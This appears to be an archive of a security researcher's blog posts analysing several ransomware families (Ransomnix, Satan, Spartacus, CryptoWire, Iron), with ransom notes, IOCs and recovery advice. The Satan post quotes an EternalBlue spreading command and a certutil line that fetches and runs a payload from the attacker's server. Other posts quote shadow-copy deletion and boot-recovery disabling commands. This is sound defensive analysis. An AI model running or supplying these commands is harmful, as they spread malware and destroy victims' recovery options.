Saturday, April 28, 2018

Ransomnix ransomware variant encrypts websites



Ransomnix is a (supposedly Jigsaw, but not really) ransomware variant that holds websites for ransom, and encrypts any files associated with the website.

This ransomware was discovered in the second half of 2018, and there's a brief write-up by Amigo-A here as well: Ransomnix ransomware

In this blog post, we'll discuss a newer variant.


Analysis

Several encrypted websites were discovered, which display the following message:

Figure 1 - Ransom message, part 1

Figure 2 - Ransom message, part 2

The full message is as follows:


JIGSAW RANSOMNIX 2018
I WANT TO PLAY A GAME!
Now Pay 0.2 BTC
OR
Payment will increase by
0.1
BTC each day after
00:00:00
Your Key Will Be Deleted
Your Bill till now 2.4000000000000004 BTC
Dear manager, on
Fri Apr 06 2018 02:08:34 GMT+0100 (GMT Summer Time)
your database server has been locked, your databases files are encrypted
and you have unfortunately "lost" all your data, Encryption was produced using
unique public key RSA-2048 generated for this server.
To decrypt files you need to obtain the private key.
All encrypted files ends with .Crypt
Your reference number: 4027
To obtain the program for this server, which will decrypt all files,
you need to pay 0.2 bitcoin on our bitcoin address 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o (today 1 bitcoin was around 15000 $).
After payment send us your number on our mail crypter@cyberservices.com and we will send you decryption tool (you need only run it and all files will be decrypted during a few hours depending on your content size).
Before payment you can send us one small file (100..500 kilobytes) and we will decrypt it!
It's your guarantee that we have decryption tool. (use your reference number as a subject to your message)
We don't know who are you, All what we need is some money.
Don't panic if we don't answer you during 24 hours. It means that we didn't received your letter and write us again.
You can use one of that bitcoin exchangers for transfering bitcoin.
https://localbitcoins.com
https://www.kraken.com
You dont need install bitcoin programs - you need only use one of this exchangers or other exchanger that you can find in www.google.com for your country.
Please use english language in your letters. If you don't speak english then use https://translate.google.com to translate your letter on english language.
You do not have enough time to think each day payment will increase by
0.1 BTC and after one week your privite key will be deleted and your files will be locked for ever.

People use cryptocurrency for bad choices,
 but today you will have to use it to pay for your files!
 It's your choice!

The following JavaScript is responsible for keeping track of the price, and increasing it:

Figure 3 - JS function

The starting price is set at 0.2 BTC, but will increase every day with 0.1 BTC thanks to two functions: inprice and startTimer.
The function for calculating the time and date, startTimer, is a copy/paste from the following StackOverflow answer: The simplest possible JavaScript countdown timer?

Note that the start_date variable, 1522976914000, is the epoch timestamp in milliseconds, which converted is indeed Friday 6 April 2018 01:08:34, as mentioned in the ransom note.

Ransomware message details:

BTC Wallet: 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o
Email: crypter@cyberservices.com 
Extension: .Crypt

Files will be encrypted, as claimed by the cybercriminals, with RSA-2048.

Unfortunately, it appears several people have already paid for decryption: 1VirusnmipsYSA5jMv8NKstL8FkVjNB9o


Disinfection

If possible, restore the website from a backup, and consequently patch your website, this means: install all relevant and security patches for your CMS, and plugins where applicable.

Then, change all your passwords. Better be safe than sorry.

It is currently unknown if decryption is possible. If you have an example of an encrypted file, please do upload it to ID Ransomware and NoMoreRansom, to see if decryption is possible, or if a decryptor can be developed.


Prevention

For preventing ransomware that attacks your websites, you can follow my prevention tips here.

General ransomware prevention tips can be found here.


Conclusion

Ransomware can in theory be installed on everything; whether it's your machine, your website, or your IoT device. Follow the prevention tips above to stay safe.

Remember: create backups, regularly, and test them as well.



IOCs

Sunday, April 22, 2018

Satan ransomware adds EternalBlue exploit


Today, MalwareHunterTeam reached out to me about a possible new variant of Satan ransomware.

Satan ransomware itself has been around since January 2017 as reported by Bleeping Computer.

In this blog post we'll analyse a new version of the infamous Satan ransomware, which since November 2017 has been using the EternalBlue exploit to spread via the network, and consequently encrypt files.


Analysis

First up is a file inconspicuously named "sts.exe", which may refer to "Satan spreader".


The file is packed with PECompact 2, and is therefore only 30KB in filesize. 

Notably, Satan has used different packers in multiple campaigns, for example, it has also used UPX and WinUpack. This is possibly due to a packer option in the Satan RaaS builder. Fun fact: Iron ransomware, which may be a spin-off from Satan, has used VMProtect.

"sts.exe" acts as a simple downloader, and will download two new files, both SFX archives, and extract them with a given password:


Figure 1 - download and extract two new files

Both files will be downloaded from 198.55.107[.]149, and use a custom User-Agent "RookIE/1.0", which seems a rather unique User-Agent.
  • ms.exe has password: iamsatancryptor
  • client.exe has password: abcdefghijklmn
It appears the Satan ransomware developers showcase some sense of humor by using the password "iamsatancryptor". 

Once the user has executed "sts.exe", they will get the following UAC prompt, if enabled:

Figure 2 - UAC prompt

Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named "Cryptor.exe". Figure 2 shows the command line options.

Curiously, and thanks to the s2 option, the start dialog will be hidden, but the extraction progress is displayed - this means we need to click through to install the ransomware. Even more curious: the setup is in Chinese.

Figure 3 - End of setup screen

ms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the EternalBlue exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the C:\ProgramData folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit - it does not appear to use its own.

The infection of other machines on the network will be achieved with the following command:

cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 

We can then see an attempt to spread the ransomware to other machine in the same network:

Figure 4 - Spreading attempt over SMB, port 445

down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using DoublePulsar, and executes the following command:

cmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe

This will be used for planting sts.exe on other machines in the network, and will consequently be executed.

Satan ransomware itself, which is contained in Client.exe, will be dropped to C:\Cryptor.exe.

This payload is also packed with PECompact 2. As usual, any database-related services and processes will be stopped and killed, which it does to also encrypt those files possibly in use by another process.

Figure 5 - Database-related processes

What's new in this version of Satan, is that the exclusion list has changed slightly - it will not encrypt files with the following words in its path:

windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user

This exclusion list is reminiscent of Iron ransomware. (or vice-versa)

Satan will, after encryption, automatically open the following ransomware note: C:\_How_to_decrypt_files.txt:


Figure 6 - Ransom note


The note is, as usual, in English, Chinese and Korean, and demands the user to pay 0.3 BTC. Satan will prepend filenames with its email address, satan_pro@mail.ru, and append extensions with .satan. For example: [satan_pro@mail.ru]Desert.jpg.satan

BTC Wallet: 14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo 
Email: satan_pro@mail.ru
Note: _How_to_decrypt_files.txt

It appears one person has already paid 0.2 BTC:
https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo

Satan will create a unique mutex, SATANAPP, so the ransomware won't run twice. It will also generate a unique hardware ID and sends this to the C2 server:

GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1Connection: Keep-AliveUser-Agent: Winnet ClientHost: 198.55.107.149

As mentioned in the beginning of this blog post, Satan ransomware has been using EternalBlue since at least November 2017 last year. For example, 25005f06e9b45fad836641b19b96f4b3 is another downloader which works similar to what is posted in this blog. It would fetch the following files:

2017-11-20 18:35:17 UTC ( 5 months ago )

For additional reading, read this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.


Disinfection

You may want to verify if any of the following files or folders exist:

  • C:\sts.exe
  • C:\Cryptor.exe
  • C:\ProgramData\ms.exe
  • C:\ProgramData\client.exe
  • C:\Windows\Temp\KSession

Prevention

  • Enable UAC
  • Enable Windows Update, and install updates (especially verify if MS17-010 is installed)
  • Install an antivirus, and keep it up-to-date and running
  • Restrict, where possible, access to shares (ACLs)
  • Create backups! (and test them)
More ransomware prevention can be found here.


Conclusion

Satan is not the first ransomware to use EternalBlue (for example, WannaCry), however, it does appear the developers of Satan are continuously improving and adding features to its ransomware.

Prevention is always better than disinfection/decryption.




IOCs

Sunday, April 15, 2018

This is Spartacus: new ransomware on the block


In this blog post, we'll analyse Spartacus, one of many new ransomware families popping up in 2018.


Analysis

This instance of Spartacus ransomware has the following properties:





Figure 1 - Spartacus ransomware message

The message reads:

All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us the e-mail:
MastersRecovery@protonmail.com and send personal ID KEY:
In case of no answer in 24 hours us to theese e-mail: MastersRecovery@cock.li

The user may send up to 5 files for free decryption, as "guarantee". There's also a warning message at the end of the ransomware screen:

Do not rename encrypted files.
Do not try decrypt your data using party software, it may cause permanent data loss.
Decryption of your files with the help of thrid parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Spartacus will encrypt files, regardless of extension, in the following folders:

Figure 2 - Target folders to encrypt

Generating the key:


Figure 3 - KeyGenerator

As far as I'm aware, Spartacus is the first ransomware who explicitly asks you to send the public key (ID KEY), rather than just sending an email, including the Bitcoin address straight away, or sending the key automatically.

Encrypted files will get the extension appended as follows:
.[MastersRecovery@protonmail.com].Spartacus 

For example:
 Penguins.jpg.[MastersRecovery@protonmail.com].Spartacus

It will also drop the ransomware note, "READ ME.txt" in several locations, such as the user's Desktop:

All your data has been locked us. You want to return? Write email MastersRecovery@protonmail.com or MastersRecovery@cock.li Your personal ID KEY: DvQ9/mvfT3I7U847uKcI0QU3QLd+huv5NOYT2YhfiySde0vhmkzyTtRPlcu73BAJILIPdALjAIy5NLxBHckfyV2XS+GXdjlHMx2V/VEfj4BrZkLB3BQtEdAqS1d2yzb/2+AqTNjsRfZ99ZWVxUZO3AeEZk5h0+3hNM5GogUN2oV5zHkbMZuDaXZxQr56r8UKnW7gmSycdcJh2ueZMuEP1tAuuzdZYgmZ05x9ZT8FX9HIo03rwsi6UiJlgUTZCkiilZjxYyG+qVE+Gjk4H7dnXbQP1PC3k2WICA9R4TYb9SCdv8U/e5sxbuKAbJgEZ114liwHLasmLvQfKYSbxMlbEg==

Interestingly enough, Spartacus also embeds what appears to be a hardcoded and private RSA key:

xA4fTMirLDPi4rnQUX1GNvHC41PZUR/fDIbHnNBtpY0w2Qc4H2HPaBsKepU33RPXN5EnwGqQ5lhFaNnLGnwYjo7w6OCkU+q0dRev14ndx44k1QACTEz4JmP9VGSia6SwHPbD2TdGJsqSulPkK7YHPGlvLKk4IYF59fUfhSPiWleURYiD50Ll2YxkGxwqEYVSrkrr7DMnNRId502NbxrLWlAVk/XE2KLvi0g9B1q2Uu/PVrUgcxX+4wu9815Ia8dSgYBmftxky427OUoeCC4jFQWjEJlUNE8rvQZO5kllCvPDREvHd42nXIBlULvZ8aiv4b7NabWH1zcd2buYHHyGLQ==AQAB

Spartacus will delete Shadow Volume Copies by issuing the following command:

cmd.exe /c vssadmin.exe delete shadows /all /quiet

A unique mutex of "Test" will be created in order to not run the ransomware twice, and Spartacus will also continuously keep the ransomware screen or message from running in the foreground or on top, using the SetForegroundWindow function:

Figure 4 - Ransom will stay on top and annoy the user



Repeating, email addresses used are:

MastersRecovery@protonmail.com
MastersRecovery@cock.li

Decryption may be possible if the ransomware is left running, by extracting the key from memory.


Conclusion

Spartacus is again another ransomware family or variant popping up.

Figure 5 - Meme

Make sure to read the dedicated page on ransomware prevention to prevent Spartacus or any other  ransomware.



IOCs

Thursday, April 12, 2018

CryptoWire ransomware not dead


CryptoWire is an "open-source" ransomware based on the AutoIT scripting language, and has been around since 2016. For some background, read the following post on Bleeping Computer:
"Proof of Concept" CryptoWire Ransomware Spawns Lomix and UltraLocker Families

I already encountered a CryptoWire variant last year, when it was used to target users in Brazil:
Ransomware, fala sério!

In this blog post, we'll briefly analyse another, recent, CryptoWire sample.

Analysis

This CryptoWire variant has the following properties:


Figure 1 - Typical CryptoWire layout

The message reads:

The only way you can recover your files is to buy a decryption key
The payment method is: Bitcoins. The price is: $1000 = Bitcoins
When you are ready, send a message by email to wlojul@secmail.pro
We will send you our BTC wallet for the transfer
After confirmation we will send you the decryption key
Click on the 'Buy decryption key' button.

CryptoWire will encrypt files with the following extensions (282 total):

3fr, 7z, EPS, M3U, M4A, PEM, PSD, WPS, XLSX, abw, accdb, afsnit, ai, aif, arc, arw, as, asc, asd, asf, ashdisc, asm, asp, aspx, asx, aup, avi, bay, bbb, bdb, bibtex, bkf, bmp, bmp, bpn, btd, bz2, c, cdi, cdr, cer, cert, cfm, cgi, cpio, cpp, cr2, crt, crw, csr, cue, dbf, dcr, dds, dem, der, dmg, dng, doc, docm, docx, dsb, dwg, dxf, dxg, eddx, edoc, eml, emlx, eps, epub, erf, fdf, ffu, flv, gam, gcode, gho, gpx, gz, h, hbk, hdd, hds, himmel, hpp, ics, idml, iff, img, indd, ipd, iso, isz, iwa, j2k, jp2, jpeg, jpf, jpg, jpm, jpx, jsp, jspa, jspx, jst, kdc, key, keynote, kml, kmz, lic, lwp, lzma, m4v, max, mbox, md2, mdb, mdbackup, mddata, mdf, mdinfo, mds, mef, mid, mov, mp3, mp4, mpa, mpb, mpeg, mpg, mpj, mpp, mrw, msg, mso, nba, nbf, nbi, nbu, nbz, nco, nef, nes, note, nrg, nri, nrw, odb, odc, odm, odp, ods, odt, ogg, one, orf, ova, ovf, oxps, p12, p2i, p65, p7, p7b, p7c, pages, pct, pdd, pdf, pef, pem, pfx, php, php3, php4, php5, phps, phpx, phpxx, phtm, phtml, pl, plist, pmd, pmx, png, ppdf, pps, ppsm, ppsx, ppt, pptm, pptx, ps, psd, pspimage, pst, ptx, pub, pvm, qcn, qcow, qcow2, qt, r3d, ra, raf, rar, raw, rm, rtf, rtf, rw2, rwl, s, sbf, set, skb, slf, sme, smm, snp, spb, sql, sr2, srf, srt, srw, ssc, ssi, stg, stl, svg, swf, sxw, syncdb, tager, tc, tex, tga, thm, tif, tiff, til, toast, torrent, txt, vbk, vcard, vcd, vcf, vdi, vfs4, vhd, vhdx, vmdk, vob, vsdx, wav, wb2, wbk, wbverify, webm, wmb, wpb, wpd, wps, x3f, xdw, xlk, xlr, xls, xlsb, xlsm, xlsx, xz, yuv, zip, zipx

It will also encrypt files, regardless of extension, in certain folders such as Desktop.

Files are encrypted with AES, and prepends extension of encrypted files with ".encrypted.". For example: Tulips.encrypted.png.

CryptoWire will delete Shadow Volume Copies and disable BCDEdit by executing these commands:
vssadmin.exe Delete Shadows /All /Quietbcdedit /set {default} recoveryenabled Nobcdedit /set {default} bootstatuspolicy ignoreallfailures

It will additionally create a scheduled task for persistence.

You can decrypt files for this specific variant with the following Decryption Key:
VgjRPoOM0oa92_jId!/wkMeW6,guuSe



Conclusion

Some ransomware variants simply do not die, one example of these appears to be CryptoWire. If you have been hit by this particular strain, use the decryption key as instructed above, and your files will be decrypted.

Make sure to read the dedicated page on ransomware prevention to prevent CryptoWire or any other "open-source" ransomware to infect your machine, and encrypt your files.


IOCs

Tuesday, April 10, 2018

Maktub ransomware: possibly rebranded as Iron



In this post, we'll take a quick look at a possible new ransomware variant, which appears to be the latest version of Maktub ransomware, also known as Maktub Locker.

Hasherazade from Malwarebytes has, as per usual, written an excellent blog on Maktub Locker in the past, if you wish to learn more: Maktub Locker – Beautiful And Dangerous

Update - 2018-04-14: Read the conclusion at the end of this post to learn more about how Iron ransomware mimicked at least three different ransomware families.


Analysis

A file was discovered, named ado64 with the following properties:



Maktub typically sports a graphically appealing lock screen, as well as payment portal, and promotes "Maktub Locker" extensively. 


Interestingly enough, this variant has removed all references to Maktub. The figures below represent lock screen and payment portal, when stepping through.


Figure 1 - Lock screen/warning

Email address: recoverfile@mail2tor.com
Bitcoin address: 1cimKyzS64PRNEiG89iFU3qzckVuEQuUj
Ransomware note: !HELP_YOUR_FILES.HTML


Figure 2 - Payment portal

Figure 3 - Hello! (after entering the personal ID)
The text reads:

We’re very sorry that all of your personal files have been encrypted :( But there are good news – they aren’t gone, you still have the opportunity to restore them! Statistically, the lifespan of a hard-drive is anywhere from 3 to 5 years. If you don’t make copies of important information, you could lose everything! Just imagine! In order to receive the program that will decrypt all of your files, you will need to pay a certain amount. But let’s start with something else…


Figure 4 - "We are not lying"


Figure 5 - Ransomware cost


Figure 6 - Where to pay


Figure 7- Last but not least: how to buy Bitcoins


In previous versions of Maktub, you could decrypt 1 file for free, however, with the current rebranding, this option has disappeared. Since the ransomware has rebranded, we'll name it "Iron" or "Iron ransomware", due to the name of the decrypter, IronUnlocker.

 Iron encrypts a whopping total of 374 extensions, these are as follows:

.001, .1cd, .3fr, .8ba, .8bc, .8be, .8bf, .8bi8, .8bl, .8bs, .8bx, .8by, .8li, .DayZProfile, .abk, .ade, .adpb, .adr, .aip, .amxx, .ape, .api, .apk, .arch00, .aro, .arw, .asa, .ascx, .ashx, .asmx, .asp, .asr, .asset, .bar, .bay, .bc6, .bc7, .bi8, .bic, .big, .bin, .bkf, .bkp, .blob, .blp, .bml, .bp2, .bp3, .bpl, .bsa, .bsp, .cab, .cap, .cas, .ccd, .cch, .cer, .cfg, .cfr, .cgf, .chk, .class, .clr, .cms, .cod, .col, .con, .cpp, .cr2, .crt, .crw, .csi, .cso, .css, .csv, .ctt, .cty, .cwf, .d3dbsp, .dal, .dap, .das, .db0, .dbb, .dbf, .dbx, .dcp, .dcr, .dcu, .ddc, .ddcx, .dem, .der, .desc, .dev, .dex, .dic, .dif, .dii, .disk, .dmg, .dmp, .dob, .dox, .dpk, .dpl, .dpr, .dsk, .dsp, .dvd, .dxg, .elf, .epk, .eql, .erf, .esm, .f90, .fcd, .fla, .flp, .for, .forge, .fos, .fpk, .fpp, .fsh, .gam, .gdb, .gho, .grf, .h3m, .h4r, .hkdb, .hkx, .hplg, .htm, .html, .hvpl, .ibank, .icxs, .img, .indd, .ipa, .iso, .isu, .isz, .itdb, .itl, .itm, .iwd, .iwi, .jar, .jav, .java, .jpe, .kdc, .kmz, .layout, .lbf, .lbi, .lcd, .lcf, .ldb, .ldf, .lgp, .litemod, .lng, .lrf, .ltm, .ltx, .lvl, .m3u, .m4a, .map, .mbx, .mcd, .mcgame, .mcmeta, .md0, .md1, .md2, .md3, .mdb, .mdbackup, .mddata, .mdf, .mdl, .mdn, .mds, .mef, .menu, .mm6, .mm7, .mm8, .moz, .mpq, .mpqge, .mrwref, .mxp, .ncf, .nds, .nrg, .nri, .nrw, .ntl, .odb, .odf, .odp, .ods, .odt, .orf, .owl, .oxt, .p12, .p7b, .p7c, .pab, .pbp, .pef, .pem, .pfx, .pkb, .pkh, .pkpass, .plc, .pli, .pot, .potm, .potx, .ppf, .ppsm, .pptm, .prc, .prt, .psa, .pst, .ptx, .pwf, .pxp, .qbb, .qdf, .qel, .qic, .qpx, .qtr, .r3d, .raf, .re4, .res, .rgn, .rgss3a, .rim, .rofl, .rrt, .rsrc, .rsw, .rte, .rw2, .rwl, .sad, .sav, .sc2save, .scm, .scx, .sdb, .sdc, .sds, .sdt, .shw, .sid, .sidd, .sidn, .sie, .sis, .slm, .slt, .snp, .snx, .spr, .sql, .sr2, .srf, .srw, .std, .stt, .sud, .sum, .svg, .svr, .swd, .syncdb, .t01, .t03, .t05, .t12, .t13, .tar.gz, .tax, .tcx, .thmx, .tlz, .tor, .torrent, .tpu, .tpx, .ttarch2, .tur, .txd, .txf, .uax, .udf, .umx, .unity3d, .unr, .uop, .upk, .upoi, .url, .usa, .usx, .ut2, .ut3, .utc, .utx, .uvx, .uxx, .vcd, .vdf, .ver, .vfs0, .vhd, .vmf, .vmt, .vpk, .vpp_pc, .vsi, .vtf, .w3g, .w3x, .wad, .war, .wb2, .wdgt, .wks, .wmdb, .wmo, .wotreplay, .wpd, .wpl, .wps, .wtd, .wtf, .x3f, .xla, .xlam, .xlc, .xlk, .xll, .xlm, .xlr, .xlsb, .xltx, .xlv, .xlwx, .xpi, .xpt, .yab, .yps, .z02, .z04, .zap, .zipx, .zoo, .ztmp

Iron doesn't spare gamers, as it will also encrypt Steam files (.vdf), World of Tanks replays (.wotreplay). DayZ (.DayZProfile), and possibly others.

Folders containing the following words are exempt from encryption:

Windows, windows, Microsoft, Mozilla Firefox, Opera, Internet Explorer, Temp, Local, LocalLow, $Recycle.bin, boot, i386, st_v2, intel, recycle, 360rec, 360sec, 360sand, internet explorer, msbuild

Interestingly enough, 360sec, 360rec, and 360sand is developed by Qihoo 360, an internet security company based in China, and is an antivirus (360 Total Security is one example).  This, as well as the fact that the Iron ransomware also includes resources in Chinese Simplified, alludes this variant may be developed by a Chinese speaker.

The ransomware will additionally delete the original files after encryption, and will also empty the recycle bin. It does not remove Shadow Volume Copies or Restore Points.

Iron embeds a public RSA key as follows:

-----BEGIN RSA PUBLIC KEY-----
MIGJAoGBAIOYf0KqEOGaxdLmMLypMyZ1q/K+r6DuCdYpwZfs0EPug3ye7UjZa0QMOP5/OySr
l/uBJtkmEghEtUEo/zfcBJ7332O1ytJ7/ebIUv+ZcN1Rlswzdv7uZxYRC8u1HvrgBvAz4Atb
zx+FbFVqLB0gGixYTqbjqANq21AR6r91+oJtAgMBAAE=
-----END RSA PUBLIC KEY-----

The Iron ransomware will determine the user's WAN IP and also send a POST request to its C2 server, http://y5mogzal2w25p6bn[.]ml.

Figure 8 - Traffic

It appears Iron will create a new, random GUID, and use it as a mutex, in order to not infect the machine twice. The following values will be sent to the C2:

  • Encryption key;
  • Randk (seed);
  • GUID (mutex);
  • Start (whether ransom successfully started);
  • Market (unknown).
The C2 server will then respond with another set of values, and generate a unique Bitcoin address, which means that victims may pay twice to different addresses. Rule of thumb: do not pay the ransomware.

Of note is an email address in the response: oldblackjack@outlook.com.

Iron will additionally save certain values, such as the GUID, in HKCU\Software\CryptoA:

Figure 9 - Registry values (click to enhance)

Encrypted files will have the .encry extension appended. It is likely not possible to restore data.


Conclusion

It is currently unknown if Iron is indeed a new variant by the same creators of Maktub, or if it was simply inspired by the latter, by copying the design for the payment portal for example.

We know the Iron ransomware has mimicked at least three ransomware families:
  • Maktub (payment portal design)
  • DMA Locker (Iron Unlocker, decryption tool)
  • Satan (exclusion list)
From the screenshots above, it is obvious the portal design has been copy pasted from Maktub.

As for copying from DMA Locker, see this tweet:

And, last but not least, it uses the exact same exclusion list (folders and its content that will not be encrypted) from Satan:

Code is indeed quite unique, and Iron seems like a totally new ransomware, and may even be a "side project" by the creators of the Satan ransomware. However, at this point, there is no sure way of telling who's behind Iron. Time may be able to tell.

Decryption is impossible without the author's private key, however, it is possible to restore files using Shadow Volume Copies, or alternatively Shadow Explorer. If that doesn't work, you may try using a data recovery program such as PhotoRec or Recuva.

Take note of ID ransomware, if a decryptor should ever become available. Additionally, it may identify other families of ransomware if you are ever affected. Another service to take note of in this regard is NoMoreRansom.

For preventing ransomware, have a look here:

In short: create backups!

Questions, comments, feedback or help: leave a comment below or contact me on Twitter.


Indicators: